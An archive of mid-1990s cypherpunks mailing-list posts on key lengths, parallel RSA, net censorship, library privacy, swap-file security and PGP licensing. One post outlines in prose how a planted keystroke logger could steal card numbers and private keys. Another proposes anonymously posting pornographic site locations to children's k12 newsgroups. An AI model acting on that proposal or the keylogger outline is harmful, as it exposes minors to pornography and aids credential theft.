> >  ..."In public-key cryptography, 512-bit keys are typical and
> >  already vulnerable.  So we are looking at 640-bit-long keys
> >  supported by a scalable design."
> 
> This kind of thing disgusts me.  We already know 512-bit keys are weak.  As
> I recall, I was told that 512 bit keys could be cracked in 20,000
> MIPS-years.  If the ballpark formula holds that adding 10 bits doubles the
> security, that merely means that 640 bits is 2**(128/10) or 8000 times
> strong.  While obviously better than 512, it is not ENOUGH better to make me
> confident that this is a long-term secure length.  768 or 1024 bits should
> be considered the minimum.  A deliberate design of 640 bits makes it look
> like it's intended to be crackable in 5-10 years, much as DES was suspected
> of a similar design decision in limiting its keylength to 56 bits.

But the "scalable design" presumably means the hardware can deal
with a variety of modulus lengths.  As you say, they would be
short-sighted to make a fixed choice.

Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 2 Feb 1996 05:43:39 +0800
To: cypherpunks@toad.com
Subject: Comision del EC contra el racismo en la red (Re: CRAX Mix Rax)
In-Reply-To: <199602010519.GAA19612@utopia.hacktic.nl>
Message-ID: <Pine.ULT.3.91.960131214156.6105H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Dude, while these subject lines are very quaint, given the level of
traffic, I would really appreciate more descriptive subject headings. You
may use any official UN language that can be written in 8-bit characters. 

On Thu, 1 Feb 1996, Anonymous wrote:

> European Commission Moves To Stamp Out Racism On Internet
>      
> Burssels, 31 Jan 1996 -- The European Commission (EC) has
> formed a pan-European group to "encourage the mixing of
> people of different cultures" from both inside and
> outside Europe.  

I knew Euro-Disneyland was going to catch on some time.
 
> According to EC officials, the first task of the
> Consultative Commission on Racism and Xenophobia (CRAX),

Geez, so that wasn't a joke.

> as it is called, will be to investigate and, using legal
> means, stamp out the current wave of racism on the
> Internet.  

OK, then maybe it is a joke.
 
> In a prepared statement, CRAX said that it hopes that the
> EC "will take all needed measures to prevent the Internet
> from becoming a vehicle for the incitement of racist
> hatred."  

Prevent? How about "Band-Aid?"

Recall that in many cases, Band-Aids actually promote infection by 
providing a dark, humid place for growth.
 
> As reported previously, the "Thule Network" first came 
> to the public's attention when the January, 1994, issue
> of Chip magazine (a popular computer monthly in Germany)
> claimed to have unearthed eight Thule BBSs.  
> 
> According to Chip magazine at the time, "The (Thule)
> network distributes information on demonstrations and
> invitations to meetings, addresses for contacting parties
> and groups, and it reviews and offers books and
> magazines. One of the mail-boxes contained instructions
> for producing military explosives and letter bombs. A
> great deal of space is taken up by 'political
> discussions' among the users."

Um, OK. So force these people above ground, and they will need to 
restrict their activities to political discussions.

> Thule is Norse or Viking terminology for "top of the
> world." The Thule Network's name actually derives from
> the small, elitist 1920s movement which was considered to
> be the Nazi vanguard.

Read: a bunch of stupid thugs who don't want to be seen in daylight.

> Thule movement leaders included
> Rudolf Hess. Some BBSs on the Thule network have names
> such as "Wolf Box" and "Resistance," while many Internet
> messages are signed by people calling themselves "The
> Wolf," among other names.

What's the matter? Their mothers didn't like them or something? Just try 
holding a debate with a person with a handle like that. The audience 
would just crack up.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Thu, 1 Feb 1996 11:30:53 +0800
To: joe_n_turner@amoco.com
Subject: RE: More FUD
Message-ID: <960131215755.20206719@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>"real professionals?"  You mean the kind that take meetings to avoid work and 
>leave the office by 5:00?  

No, those are managers. (Have better equipment at home anyway 8*).

>As far as "virus writers" there are relatively few that I would lump 
>into that category, but the ones who do get there are worthy 
>of at least a little respect.

The ones I know who could, don't. Is considerably harder to write an
antivirus program that can account for Zenith ZDOS 3.21 or the original
PC-AT BIOS than a virus that blows up if you run it under NW-DOS.

>>True, in early '92 when [Mich] came out things were more difficult - not 
>>everyone had 640k in their machine so the user acurally had to have a clue 
>>how much memory was supposed to be there. Today is there anyone with 512k ?

>If my memory serves me correctly, by '92 386's were rolling off the assembly 
>lines.

You missed my point (and my canary trap). When a Pentium starts up it is
in 8086 "real" mode and is limited to the same 1 Mb basic address space
(know about the 64k - 16 bytes, is different from 8086/8).

What I was referring to was the "640k limit" imposed by 1-2-3 waaaay back
when - is stored in Bios data area (0:400) and CMOS.

>Maybe you should use WordPerfect instead.  

Actually I prefer WordStar 7.0. Magazines and the gov like WordPerfect.

>Solution: Get rid of Windows.  Upgrade to '95, NT, or go to Linux, even OS/2. 

Have been warped. Have Liniux & FreeBSD. As for Win95, why would I want to
degrade my system ?

>>And you tell me that someone is going to spread a virus on the net that will 
>>capture keystrokes on any machine it hits without anyone noticing ? It is 
>>to laugh (and if they can, they are wasting their time with credit card 
>>numbers).

>        This sounds like a challange.  Is it worth a T-Shirt?

Wasn't a challenge (though getting something to work on a "strange" NCR
notebook like mine might be 8*), never saw a BIOS leave dangling interrupts
following POST before...)
     
>Not if it is written properly.  A lot of viruses become known only when they 
>drop their payload.  Others are just poorly written, no different from a bad 
>software product.

It is not that they are written badly, just that most virus writers lack
experience and their worldview is narrow - the [Mich] we mentioned - is
obvious not that the writer did not know how to handle floppies, rather that
all he/she/it/other knew of were either 360k or 1.2 Mb. "Nightfall" writer
had apparently bever seen a Zenith 248 kit 5 BIOS. Ludwig's LBB boot sector
virus will only work under Dos 3.3 because DOS 4-up leaves different
values in the registers.

>>Fact is that the greatest protection the net has is that no two machines are 
>>alike, may even start that way but after six months, no way.

>Ahhhhh.. but your wrong.  Granted, the underlying strata may be radically 
>different, but I can run an MS-DOS program on an 300 Mhz DEC Alpha (under NT) 
>without any problems (except I couldn't get DOOM to run). 

No, you can get *some* programs to run and on your machine you may get *all*
your programs to run. But they will not run on *any* machine.

> There is already a 
>read-only Filesystem driver for Linux that will read NT.  Like TCP/IP, the 
>operating systems are going towards interoperability.

Type 7 ? Nothing magic, just different.

>The big computer companies recognize that they have to compete to survive.  No 
>longer can IBM design a machine and lock in their customers to IBM parts, IBM 
>service, and an IBM operating system.

Strength from diversity 8*). 

Meanwhile, back at FV, if someone wants to break it badly enough, they'll
buy one (or one of the FV employees) and take it apart at home. No
"professional" would attack anything that she/he did not already know
how to break. A *real* professional would buy two or three just to see
if they were all the same. Is the same problem with the "Sidewinder 
Challenge" though it did get a lot of print.
    
                                                Warmly,
                                                        Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@santafe.edu>
Date: Fri, 2 Feb 1996 13:51:52 +0800
To: cypherpunks@toad.com
Subject: Re: Noise and the Nature of Mailing Lists
In-Reply-To: <ad343a693d0210040635@[205.199.118.202]>
Message-ID: <9602010503.AA06841@sfi.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
>And remember, it's a whole lot easier using filters and reading tools to
>reduce the volume of messages on an active group than it is to get an
>inactive group up to critical mass!

Yes, definitely! I'm sending this note to remind people that they can
also read Cypherpunks via NNTP, at
  nntp://nntp.hks.net/hks.lists.cypherpunks/

There are several programs that can read newsgroups on other NNTP
servers. I use Emacs Gnus, which has an excellent set of filtering tools.
Cypherpunks would be a lot harder to read without it. It'd be easier
to read if everyone preserved the References: headers, btw.

(thanks, hks.net!)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Thu, 1 Feb 1996 11:35:11 +0800
To: ajenks@technews.com
Subject: Call for Papers
Message-ID: <199602010308.WAA11676@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


January 31, 1996

                  Attention: Information Warriors: 

                ***** CALL FOR PAPERS *****

        Please feel free to distribute this widely.

I first want to thank the thousands of people who have been so incredibly 
supportive of my work over the last several years, and who have helped the 
public debate on Information Warfare gain and sustain the momentum we have all 
created.

As a result of the continued interest in the subject, my publisher has asked if 
I would create a 2nd. Edition with substantial updates to the original 
"Information Warfare" which was published in 1994. I told them that the new 
revised edition should include much of the thinking that has evolved on the 
topic in the last couple of years. Believe it or not, they agreed!

So, I am asking (begging? :-)  for a couple of things.

	1. We want to include a comprehensive Appendix "D" to include references 
and bibliographic information for those already in and for those entering the 
field. We would greatly appreciate any and all types of references that you feel 
will be useful for students of Infowar today and in the future. The kinds of 
material we hope to include are:
		- Web sites, mailing lists, usenet, etc.
		- Monographs and their source
		- Published papers and their source
		- Books with publisher, author, date, ISDN (oops, ISBN) price 
and a one sentence commentary.
		- Global resources on the subject.
		- Courses (civilian, military, etc.)
		- Organizations, private and gov't.

We will also add a credit/acknowledgments page for all of the Information 
Warriors who have assisted in this effort. Please supply name, title (or rank) 
contact info, and affiliation as you want it to appear in the book. (If you 
don't want your name or affiliation to appear, please so indicate and we will 
honor your request. (Honest . . . .)

Ideally, we will need to have a hard copy of the materials that we reference.

PLEASE RESPOND TO BETTY@INFOWAR.COM

	2. In order to portray the current thinking of Infowar from its many 
facets, I am also looking for short commentaries on your particular take on 
Infowar - and heavens knows there are so many  . . . perhaps googols! 

I would like to include a large number of 500-800 word overviews, or executive 
summaries of topics of interest to you, comments on my work, or perhaps on the 
efforts that you or your org are putting into the field. I am hoping to find a 
balance between the civilian viewpoints and military and international ones so 
that students and readers can see just how much work in occurring in the field. 
Organizations like AFIWC and DISA (and so on) are invited to submit a similar 
overview of their efforts in addition to individual submissions.

It is not necessary to agree with me (that would be heresy in some cases :-)) 
but let's be civil about it, OK? The purpose is to get the neurons vibrating and 
moving the field forward. 

If you take issue with, or relate to specific items/topics/comments in 
"Information Warfare" please note page number so we can tie it all together 
thematically. There will be suffixes to each chapter, and I am hoping that many 
of the responses will comment on or add to each of the chapters.

As for credit, we will list your name, contact info, affiliation etc., along 
with your particular contribution. With each submission, please just say 
something like, "I hereby give Winn Schwartau, Interpact, Inc., and Thunders 
Mouth Press non-exclusive permission to use this work." That keeps the publisher 
happy and still lets you own your own words. If it's a personal opinion, and not 
an official one of your organization, a simple disclaimer like, "these are the 
opinions of the author, and not necessarily those of my organization." We will 
provide a general suffix disclaimer to that effect anyway. If it is the official 
view of your org, then please indicate so clearly, so we may make an accurate 
distinction. 

If we decide to edit your piece substantively, we will run it back to you for 
approval before printing. All we will ask is a timely return.

To get your brain thinking on the kinds of topics I am looking for:

	- Civilian Defense
	- "This is an act of War"
	- "This is not an act of War"
	- Infowar as an alternative to conventional conflict.
	- Non-lethal conventional warfare
	- Enhancing military efficiency with Infowar
	- PsyOps as Infowar
	- Hackers: A National Resource

Please consider all three Classes of Infowar when deciding what you want to say. 
Since you only have 500-800 words to say it, I suggest that it be clear, concise 
and to the point. 

Controversy is good. But just as good is if your comments are thought provoking 
and stimulate additional discussion about your subject. For each contribution we 
accept, (and there will be a lot we will!) we will provide a free copy of the 
new revised "Information Warfare: Revised Edition" (or whatever they decide to 
call it.)

PLEASE RESPOND TO:  BETTY@INFOWAR.COM

		3. We have already received a large number of short "pull 
quotes" of one or two sentences for the cover and inside covers where we give 
full attribution. If anyone is so inclined, we are looking for a few more that 
comment on the existing works. 

PLEASE RESPOND TO BETTY@INFOWAR.COM

		4. Robert Steele at ceo@oss.net has agreed to help me pull 
together a "Who's Who" of Information Warfare. Please supply names, contact 
information and brief biographies to him at CEO@OSS.NET.

Again, I want to thank everyone out there for their support, and I look forward 
to seeing what everyone has to say. Please send your input to

BETTY@INFOWAR.COM no later than February 29, 1996.

Feel free to distribute this widely and/or post as you see fit.


Winn Schwartau

Peace
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Ghio <ghio@netcom.com>
Date: Thu, 1 Feb 1996 14:26:43 +0800
To: cypherpunks@toad.com
Subject: Re: parallel encryption
In-Reply-To: <Pine.SUN.3.91.960131051351.13875A-100000@tipper.oit.unc.edu>
Message-ID: <199602010608.WAA03210@myriad>
MIME-Version: 1.0
Content-Type: text/plain


ses@tipper.oit.unc.edu (Simon Spero) wrote:
> Ok, so I've got my BeBox and so finally have an SMP of my own again;
> anyone want to suggest any cool crypto stuff that parallelises well?
> Rogaways hashs look interesting, and nDES offers an obvious process
> network for pipelining, but what about things like running multiple
> interleaved CBC streams in parallel, with each stream starting off from a
> different IV? I can't think of any practical ways of speeding up a single
> RSA operation, although twice as many processors obviously gives twice
> the thruput.

One way to speed up RSA is to compute the series m^2, m^4, m^8, m^16...
on one processor and then multiply together the values for each one bit
in the decryption exponent on the other processor.  It's only about a 33%
speedup tho.  The other possibility is to compute the two 'halves' on
seperate processors when doing decryption.  I don't know of any way to
parallelize it to more than two processors for encrypting or more than
four for decrypting.

Discrete log systems are a bit more interesting in this respect - you can
precompute the series g^2, g^4, g^8...  (I think cryptolib does this)
then the initial parameter in a Diffie-Hellman exchange is simply the 
product of some elements of that series.  The multiplications can be
carried out in parallel in a hierarchial fashion which can be completed
in O(log(log(m))) time, where m is the modulus (assuming you have enough
processors).  However, for the second half of the exchange, you can't
precompute anything so you are stuck with the same problem as with RSA.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 1 Feb 1996 11:34:52 +0800
To: jonl@well.com
Subject: Re: Denning's misleading statements
Message-ID: <199602010308.WAA27249@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by jonl@well.com (Jon Lebkowsky) on Wed, 31 
Jan  6:34 PM


>Definitely! I wonder who we could get from the FBI??


   Try for Al Bayse, formerly assistant director of the FBI's
   Technical Services Division and its long-time senior
   techonology expert. Here's a quote from David Burnham's new
   book, "Above the Law:"

      Al Bayse, whom FBI documents suggest has been involved
      in the Clipper since its inception, was ecstatic about
      its inception. Shortly before the White House announced
      the project to reporters, he telephoned the three
      leading security experts in the academic world --
      Dorothy Denning of Georgetown University, Lance Hoffman
      of George Washington University and Peter Neumann of SRI
      International -- and informed them that the FBI's
      problem had been solved. (p. 150)

   Burnham claims that because Bayse shaped and directed the
   FBI's investigative technologies from the late 1970s to the
   mid-1990s he "may well be the nation's single most
   influential law enforcement official since J. Edgar
   Hoover." (p. 136)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bofur@alpha.c2.org
Date: Thu, 1 Feb 1996 15:08:54 +0800
To: cypherpunks@toad.com
Subject: France to push for international net legislation
Message-ID: <199602010627.WAA02672@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


According to radio reports here, the French government has just announced
it's intention to pressure the European community to create 
international laws to control the Internet.

This is in the wake of the net publication of a certain book that had
been heavily censored in France.

Does anyone have any more details - has an actual policy been put forward
stating how they intend to control the net? And what do/will the laws
cover?

Bofur.

--------------------------------------------------------------------------
Bofur	bofur@alpha.c2.org
	PGP available from PGP key servers
	Key fingerprint = 81 0C 8F 88 0A 4F 67 3F  ED 52 DE 3C 55 34 26 25




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 1 Feb 1996 12:52:07 +0800
To: frissell@panix.com
Subject: Re: [rant] A thought on filters and the V-Chip
Message-ID: <01I0OEXDIYGWA0UO1J@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frissell@panix.com"  "Duncan Frissell" 29-JAN-1996 11:02:03.09

>What parents are attempting to do when they restrain their children's access
to "sex and drugs and rock and roll" (or Republicanism for that matter) is
to mediate their "spiritual" environment to keep them from becoming
hardened.  They know the kids will grow up, they just want them to grow up
in a nice way.
-------------------
	From what I've seen, kids are better off when they don't see the world
through blinders/rose-colored-glasses. For instance, benign neglect is a lot
better for children than overprotectiveness... I wish my parents (as much as I
love them) had applied it to me, I'd have turned out a lot better. (I am also
getting information from multiple psychiatrists and psychologists, including
ones who (unlike me) have raised children).
------------------- 

>Children who listen to Vera Lynn's singing and Cole Porter's songs will end
up quite different from those who favor louder, less vocal music.  Note that
in spite of what liberals might think, fundamentalist christians are less
likely to divorce, less likely to report spousal beatings, less likely to
kill themselves, and more likely to measure high personal satisfaction
                                            ^^^^^^^^^^^^^^^^^^^^^^^^^^
levels on standard psychological tests than are, say, readers of The Nation.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-------------------
	Well, yes, someone with a blind conviction that they're going to
someplace nice when they die, confidence that their intolerance is right,
and other such ideas tends to have higher personal satisfaction levels. Also,
this "personal satisfaction" is overrated... as Jack L. Chalker pointed out,
a blade of grass is perfectly happy... even after it's picked.
-------------------

>The cypherpunks relevance of all this is that it should soon be possible to
create completely mediated environments for ourselves and our children.
Through the use of implants and real-time VR processing, it will be possible
to edit our "interface" with the Real World such that unpleasant aspects are
edited out.  We will be able to change the attire, hair, facial expressions,
voice, and even smell of those around us to conform to our own esthetic
desires.  Likewise with our physical surroundings.  Safety may discourage
making a complete transformation in one's surroundings, but one can
certainly soften the edges.
---------------------
	Sasha's enhanced reality or whatever it was called, yes. The cypherpunk
relevance would appear to be more that there should be methods to get true
information to kids (and those under repressive governments, which is about
the same thing in most families) despite attempts to stop it. Anyone for
posting (anonymously) some image viewers and pornographic site locations to one
of the k12 groups?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 2 Feb 1996 00:22:56 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: France to push for international net legislation
In-Reply-To: <ad35ab7305021004b96a@[205.199.118.202]>
Message-ID: <199602010728.XAA09493@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> I guess Declan M. won't be visting France or any of the other EU countries
> any time soon!

	That reminds me of a question--

	If, for example, Germany decides that my company is in
violation of their laws for mirroring the Zundelsite, will they send
us a letter saying that, so we know not to go to Germany?

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 1 Feb 1996 12:52:46 +0800
To: trei@process.com
Subject: Re: Escrowing Viewing and Reading Habits with the Governmen
Message-ID: <01I0OF2L9QGAA0UO1J@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"trei@process.com" 29-JAN-1996 14:32:19.64

>The general reaction of the library community was, I am glad to say, 
entirely pro-privacy.
--------------------
	To their credit, yes. One application of this that others may be
interested in is that ILL requests (I have been told) come from a library, not
from a library's user. Thus, when I made one and got it back from the CIA's
lending library (yes, they have one), they didn't know who I was...
fortunately, given the book in question. Sort of a lesson for things like
sites, et al. If all that someone can tell is that a IP or whatever request
came from a particular site, then traffic analysis and other such things are
disrupted. One way to do this would be to set up fictional accounts
automatically to serve as proxies (relayed to the real account), which would
make it impossible for a normal proxy-detector (lack of information or a
particular set of information) to filter them out.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <mixmaster@alpha.c2.org>
Date: Fri, 2 Feb 1996 00:24:37 +0800
To: cypherpunks@toad.com
Subject: NoneUnix swapfile security issues...
Message-ID: <199602010730.XAA09785@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I'm working on a unix application where I want to store a key in memory and
don't want it to get written out to a swap file.  If the key is in any of
the application's memory pages, it could be swapped out at any time, and
potentially left in the swap file when the computer is turned off.

But, what if the program creates a pipe() and writes the key into it, then
reads the key out when necessary?  A pipe has a 4K buffer, but that buffer
is in the kernel's memory, not in the application's pages.  Could a kernel
buffer get written out to a swapfile?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: take@imasy.or.jp (Hayashi_Tsuyoshi)
Date: Thu, 1 Feb 1996 19:18:30 +0800
To: Dave Roberts <djr@saa-cons.co.uk>
Subject: Re: PGP commercial usage
Message-ID: <199601311439.XAA08161@tasogare.imasy.or.jp>
MIME-Version: 1.0
Content-Type: text/plain


At  0:43 PM 96.1.31 +0000, Dave Roberts wrote:
>I have read and reread the documentation that is included with the PGP 
>distribution (although my copy is over a year old now), and am still 
>trying to work out if commercial use of 2.6ui is allowed outside the USA.
>
>Could someone elaborate for me, or perhaps point me to some up to date 
>reference documentation.

Few days ago I found good page for it.

  http://www.ifi.uio.no/pgp/FAQ.shtml#License

This page said that:

 + Can I use PGP 2.6.3i for commercial purposes?
 + 
 + Yes, you can, but you need to buy a separate license for the IDEA
algorithm used in
 + PGP. (RSA is not patented outside the US, so you don't need a license
for this
 + algorithm.) IDEA licenses can be purchased from Ascom Systec AG in
Switzerland.
 + (The licensing of the IDEA algorithm was formerly administrated by Ascom
Tech, but
 + this responsibility has been transferred to Ascom Systec. Please, do not
contact
 + Ascom Tech about this matter!) The fee is charged on a per-user basis as
follows: 

# Sorry, this is about 2.6.3i, not 2.6ui.

P.S.
Now I'm studying MacPGP...

- Tsuyoshi Hayashi <take@imasy.or.jp>
--- hayashi@scs.sony.co.jp is no longer valid.
--- Please update to take@imasy.or.jp



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Thu, 8 Feb 1996 10:16:35 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: FV's Borenstein discovers keystroke capture programs! (pictures at 11!)
In-Reply-To: <c=US%a=_%p=msft%l=RED-66-MSG960129190324HH007C00@red-02-imc.itg.microsoft.com>
Message-ID: <310F13E7.13AA@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein wrote:

> We have a few pages of C code that scan everything you type on a
> keyboard, and selects only the credit card numbers.  How easy is that to
> do with credit card numbers spoken over a telephone?
> 
> The key is large-scale automated attacks, not one-time interceptions.

This fact that the filtering can be done on the client side is nearly 
irrelevant. Most people do not hit enough keystrokes in a day to prevent sending 
the entire keyboard stream back to the filtering agent.

Since most folks do not spend most of their time typing in nonsense phrase, you 
could probably pick out the First Virtual account number also. With only a 
little more cleverness you can get the file containing private keys. With a few 
thousand tries through the stream you can decrypt that file using the user's 
pass phrase.

If you have the ability to change the software on the user's machine to 
something arbitrary, why bother stopping at something as "trivial" as a single 
credit card number.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sparks@bah.com (Charley Sparks)
Date: Sun, 4 Aug 1996 02:02:22 +0800
To: cypherpunks@toad.com
Subject: Re: List for crypto minus political rubbish
Message-ID: <v02140b04ad1058e92338@[156.80.2.159]>
MIME-Version: 1.0
Content-Type: text/plain


<rant>
Personally, I enjoy some of the rantings, although I would like a forum for
new users to get some help and guidance.. perhaps they can scan my ISP to
see if I have accessed some bomb making info ...
</rant>


>Status: U
>Date: Sat, 3 Aug 1996 13:34:10 GMT
>To: Matts Kallioniemi <matts@cyberpass.net>
>Subject: Re: List for crypto minus political rubbish
>From: jya@pipeline.com (John Young)
>Cc: cypherpunks@toad.com
>X-PipeUser: jya
>X-PipeHub: pipeline.com
>X-PipeGCOS: (John Young)
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>
>On Aug 03, 1996 14:38:59, 'Matts Kallioniemi <matts@cyberpass.net>' wrote:
>
>>Just about everything on cryptography has already been said far too many
>times.
>>Just read Applied Cryptography and be done with it. What remains to
>discuss is
>>politics, psychology and marketing. How do you get people to use the
>>cryptography that already exists and how will the authorities react when
>people
>>do use it.
>
>
>An exemplary air-clearing for a smoke-filled agenda; and two challenging
>questions which may pose a High Noon amongst munitions-slingers. Bravo,
>Matts, for cryptic concision.
>
>
>
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexandre Maret <amaret@infomaniak.ch>
Date: Sat, 17 Jan 1998 07:35:55 +0800
To: "cypherpunks@toad.com>
Subject: Swisskey: Swiss issuing office for Internet certificates established
Message-ID: <30FC30BB.776975B1@infomaniak.ch>
MIME-Version: 1.0
Content-Type: text/plain



http://www.swisskey.com/mitteilung_e.html

Swisskey: Swiss issuing office for Internet certificates established

Zurich/Berne, 18 December 1997 - Swisscom, Telekurs and DigiSigna have
established the joint venture Swisskey and thus laid the foundations for
secure electronic commerce in the worldwide web. The certificates issued
by Swisskey are available to individuals and companies and enable clear
and secure mutual identification in the Internet. Swisskey will be
registered in January 1998 and will start offering its services on the
Internet at www.swisskey.com in the second quarter of 1998. 

Electronic commerce has good future prospects: telebanking and
teleshopping in the Internet and the secure exchange of EDI messages
between applications are some of its possible applications. So far,
however, service offers and their acceptance have both been limited,
since service providers and customers cannot identify each other
immediately and are dependent on bilateral agreements. 

Electronic certificates are the solution to this problem. They offer
mutual trust in the otherwise anonymous field of electronic commerce.
They allow users to be identified and texts to be signed digitally and
encoded in such a way that only the recipient can read them. Users can
obtain a certificate from a registration office by showing some form of
identification. Possible registration offices are post offices, Swisscom
shops, banks and chambers of commerce. 

"The Swisskey joint venture aims to encourage the development of
electronic commerce in Switzerland by offering a customerfriendly,
secure and upgradeable certification service," explained Swisskey
Managing Director, Christian Graber. 

Swisskey will offer SSL certificates as supported by all common Internet
browsers (X.509 certificates), Edifact certificates for EDI messages and
application and companyspecific certificates for uses such as Intranet
applications. 

Swisscom Ltd and Telekurs Holding AG each hold 47.5% of Swisskey AG and
DigiSigna (an association of chambers of commerce of Switzerland and the
Principality of Liechtenstein) holds the remaining 5%. DigiSigna also
aims to win international approval for the Swisskey certificates. 

For questions:

DigiSigna Otto Müller 
omueller@zurichcci.ch
Tel. 01 / 221 07 42
Fax. 01 / 221 76 15 

Telekurs Holding AG Bernhard Wenger 
wnb@holding.telekurs.com
Tel. 01 / 279 22 20
Fax. 01 / 279 23 36 

Swisscom Sepp Huber 
Josef.Huber@swisscom.com
Tel. 031 / 342 13 00
Fax. 031 / 342 13 10





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Angooki Taipu <atb@purple.reddesign.com>
Date: Wed, 29 Jan 1997 20:25:54 -0800 (PST)
To: sameer@c2.net
Subject: Re: Cats Out of Bags
Message-ID: <199701300425.UAA22249@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


 >       David Aaron seems to make lying out of his ass a hobby. His
 >talk at the RSA conference was such a load of bullshit it wasn't even
 >funny.

 >       "Other governments were upset with the 56-bit export
 >allowance. They said it was going to undermine their national
 >security."

I'm sure a few countries are upset because the US policy may in some way
impede their citizens ability to adopt STRONG cryptography and secure their
information infrastructure, thus injuring their national security.

Remember, Aaron is employee of the government.  He talks in doublespeak,


Angooki Taipu
atb@purple.reddesign.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Bailey <mjb@aiinc.com>
Date: Sun, 26 Jan 1997 15:11:01 -0800 (PST)
To: DataETRsch@aol.com
Subject: Re: If you were unable to download UDCM V2.0 before....
Message-ID: <199701262311.PAA26794@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes that would be cool so i could test it out against my decompiler that
seems to do great agains encrypted txt. With the realease of the usa policy
on encryption do you all think that the 160 level will be increased or will
they make new standards.

----------
> From: ichudov@algebra.com
> To: DataETRsch@aol.com
> Cc: cypherpunks@toad.com
> Subject: Re: If you were unable to download UDCM V2.0 before....
> Date: Thursday, January 23, 1997 8:06 PM
> 
> Mr. Ramos, 
> 
> 
> You promised to release the algorithm of your program as well as
> crypto-relevant source code. You promised to do it atfer a month, and
> the time has come. We are eagerly awaiting the promised code.
> 
> Thank you so much for your openness.
> 
> igor
> 
> DataETRsch@aol.com wrote:
> > 
> > {If you were unable to download UDCM V2.0 before, we're extremely
sorry.}
> > {UDCM's web site may have been under construction during the time you
> > visited.}
> > {UDCM's web site has finished undergoing its changes and will operate
> > correctly.}
> > {UDCM V2.0 has been extensively modified from its previous variation.}
> > {Digital signaturing and public key cryptosystem capabilities have been
> > added.}
> > {UDCM's DS and PKCS techniques do NOT make use of conventional PN
factoring.}
> > {UDCM's source code is currently unavailable. PLEASE DO NOT REQUEST
IT.}
> > {UDCM's on-line help documentation has also been extensively modified.}
> > {This advertisement has also been modified.}
> > 
> > Hello,
> > 
> > Greetings! I am Jeremy K. Yu-Ramos, president of DataET Research, Data
> > Engineering Technologies. I am sending you this message to let you know
that
> > DataET Research has recently initiated the distribution of UDCM,
Universal
> > Data Cryptography Module. UDCM implements a revolutionarily new,
extremely
> > advanced and sophisticated, digital data encryption algorithm named
IMDMP,
> > Integrated Mathematical Data Manipulation and Positioning.
> > 
> > UDCM (the IMDMP algorithm)...
> > 
> > o Is a royalty-free Windows DLL module featuring advanced cryptography.
> > o Contains more than 150 procedures and functions.
> > o Is a very cost-effective size of only 60 kilobytes.
> > o Implements the IMDMP encryption algorithm.
> > o Allows encryption keys as large as 2048 bits.
> > o Includes 18 sub-algorithms.
> > o Processes all forms of binary and ASCII files.
> > o Allows multiple encryption layer levels.
> > o Has absolutely no back-doors or magical keys.
> > o Includes time and date locking features. 
> > o Includes file specific unique encryption features.
> > o Includes file authentication guard features.
> > o Includes digital signaturing capabilities.
> > o Implements the public key cryptosystem method of security.
> > o Includes data importance and sensitivity stamping features.
> > 
> > UDCM, being a Windows DLL module, can be accessed through programs
developed
> > with popular application and database programming languages and
environments
> > such as: C, C++, Visual Basic, PowerBuilder, Delphi, OOP Pascal, Turbo
> > Pascal, dBase, Paradox, Access, Sybase, Oracle, etc. 
> > 
> > DataET Research has released a shareware version of UDCM named UDCM
V2.0.
> > 
